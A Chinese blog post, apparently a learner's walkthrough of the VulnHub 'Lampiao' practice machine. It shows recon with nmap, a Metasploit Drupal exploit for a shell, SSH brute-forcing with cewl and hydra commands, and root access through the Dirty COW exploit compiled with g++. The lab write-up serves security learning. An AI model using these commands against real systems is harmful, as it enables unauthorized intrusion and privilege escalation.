渗透测试学习(二)

最新推荐文章于 2024-08-11 20:47:36 发布
最新推荐文章于 2024-08-11 20:47:36 发布
阅读量279 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/112592899
版权

Vulnhub-----Lampiao

信息收集

arp扫到ip地址

再用nmap扫端口
在这里插入图片描述

80端口没啥东西
访问1898端口
在这里插入图片描述
可以发现是Drupal框架

漏洞利用

上MSF

在这里插入图片描述
用2018年的洞直接打

成功getshell
在这里插入图片描述

查看数据库配置文件
在这里插入图片描述

登录数据库没啥东西
应该也存在那个sql注入漏洞,我这边就不试了,之前做的DC-1也和这个差不多

查看/etc/passwd
发现tiago用户
在这里插入图片描述
老规矩 爆破ssh
这次学到一个新工具
脚本小子真香
cewl:通过爬行网站获取关键信息创建一个密码字典

cewl http://192.168.145.148:1898 -w password.txt
hydra -l tiago -P password.txt  192.168.1.127 ssh -V -t 5

在这里插入图片描述
成功登录
在这里插入图片描述

提权

对Durpal 7版本2016年都可以使用dirty(脏牛)进行提权
kali是真香,脚本小子太快乐了

searchsploit dirty
在这里插入图片描述
用第三个
用法首先先将cpp文件提到当前目录
用python起个服务
python -m SimpleHTTPServer 5555
然后将cpp文件下载靶机上
在这里插入图片描述
g++编译

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

会生成一个二进制文件
运行即可拿到root密码

在这里插入图片描述
flag在root目录下
在这里插入图片描述

penson by 小乌
关注
VulnHub-Lampiao-Walkthrough渗透学习
qq_34801745的博客
12-27 2380
VulnHub-Lampiao-Walkthrough 靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:简单 靶机发布日期:2018年7月28日 靶机描述:Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lam...
渗透测试-Lampiao靶机渗透
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-13 572
1.环境部署 靶机下载地址:https://download.vulnhub.com/lampiao/Lampiao.zip 攻击机:Kali 2019 靶机 : Lampiao 目标:拿下靶机root权限和里面的flag 2.信息搜集 使用arp-scan -l进行局域网主机发现,确定目标靶机IP为192.168.72.132 使用NMAP扫描目标靶机开发的端口 nmap -sS -p 1-65535 192.168.72.132 -n 发现存在一个ssh服务,和2个web服务 对两个web服务进
West-Wild-v1.1靶机渗透测试
最新发布
weixin_58786230的博客
08-11 323
【代码】West-Wild-v1.1靶机渗透测试
SearchSploit漏洞查找工具使用指南
大方子
10-04 7693
什么是SearchSploit: “searchsploit”是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本。 SearchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况下对网络进行安全评估。许多漏洞都包含了进制文件的链接,这些文件不包含在标准存储库中,但可以在我们的Exploit-...
dirtycow提权漏洞原理图
03-10
自己画的关于脏牛漏洞提权的原理图,个人感觉比较清晰,适合小白理解用
Vulnhub靶机系列:pWnOS: 1.0
汗的博客
03-29 2537
https://www.hackingarticles.in/hack-the-pwnos-1-0-boot-to-root/ 文章目录靶机地址利用知识信息收集Getshell提权 靶机地址 https://www.vulnhub.com/entry/pwnos-10,33/ tip:如果Vmware在首次引导时询问您是复制还是移动了该虚拟机,请单击MOVED!否则,网络设置可能会混乱。 利用知识...
渗透测试学习笔记资源
08-19
根据提供的文件信息,我们可以深入探讨渗透测试的相关知识点。渗透测试是一种模拟攻击者行为的安全评估方法,旨在识别系统、网络或应用程序中的安全漏洞。通过利用这些漏洞,渗透测试可以帮助组织了解其安全态势,并...
【推荐】最新超全的渗透测试学习基础教程集合(84份).zip
08-04
最新超全的渗透测试学习基础教程集合,新手、大佬都可以阅读: 01.入门笔记之看雪Web安全学习及异或解密示例; 02.Chrome浏览器保留密码功能渗透解析及登录加密入门笔记; 03.Burp Suite工具安装配置、Proxy基础用法...
渗透测试学习笔记之案例.pdf
04-06
渗透测试学习笔记
渗透测试学习笔记之案例一.pdf
04-06
### 渗透测试学习笔记之案例一 #### 1. 前言 在渗透测试领域,持续的技术积累和实战经验分享对于个人成长至关重要。本文档记录了一个具体的渗透测试案例,旨在通过实战演练来加深对渗透测试技术的理解,并为后续的...
Kali Linux渗透测试技术详解
02-19
本书适合使用Limux各个层次的人员作为学习渗透测试技术的基础读物,也适合对安全、渗透感兴趣的人、网络管理员及专门从事搞安全的人员等阅读。 《Kali Linux渗透测试技术详解.pdf》这篇文档主要介绍了 Kali Linux 是...
searchsploit 漏洞搜索
爱死亡机器人
05-16 1080
文章目录1. 背景2. 简介3. 下载、安装、更新4. 语法5. 实例5.1 帮助5.2 搜索漏洞关键字afd的Windows本地利用漏洞5.3 搜索标题中包含oracle windows的漏洞5.4 搜索漏洞号为39446的漏洞5.5 排除dos以及PoC值的包含linux kernel 3.2的漏洞5.6 查找mssql的漏洞5.7 查找和window XP有关的漏洞5.8 查找apple的漏洞5.9 技巧 1. 背景 在提权过程中需要通过掌握的信息来对系统、软件等存在的漏洞进行搜索,获取其利用的po
提权学习之旅——Linux操作系统提权
Lemon's blog
08-19 3049
前言: 上次学习了Windows操作系统的提权以及相关工具的利用,这次就来学习一下Linux操作系统的提权 Linux提权基础 0x00:Linux提权方法 大致归纳总结如下:
vulnhub--lampiao(脏牛提权)
鲨鱼辣椒的博客
08-03 4805
信息搜集 扫描网段确具体IP地址 扫描IP地址确定开放端口以及服务 浏览器查看网站 查看1898端口,发现另一个网站 扫描网站
【靶机渗透】LAMPIAO靶机渗透练习
serendipity1130的博客
08-30 725
LAMPIAO训练靶机 1.arp-scan -l扫描到IP地址为:192.168.225.140 使用nmap扫描到开启了22和80端口以及1898端口: nmap 192.168.225.140 -sV -sC -Pn -n -v -T5 -p- 2.访问1898端口,发现网页下面的标志:Powered by Drupal 1)进行dirsearch扫描,在目录中发现了robots.txt文件 查看该文件,查看CHANGELOG.txt文件,发现网站的版本信息7.54,看到cms的版
构建完善的安全渗透测试环境:推荐工具、资源和下载链接
weixin_43263566的博客
02-14 3912
安全渗透环境准备(工具下载)
metasploitable2 渗透测试靶机 1
m0_73910867的博客
10-11 1811
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 适用于学习网络安全。
渗透测试 靶机环境下载
zhyuxue的博客
09-09 1410
下载Linux应用程序虚拟机、Windows下载、metasploit下载。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值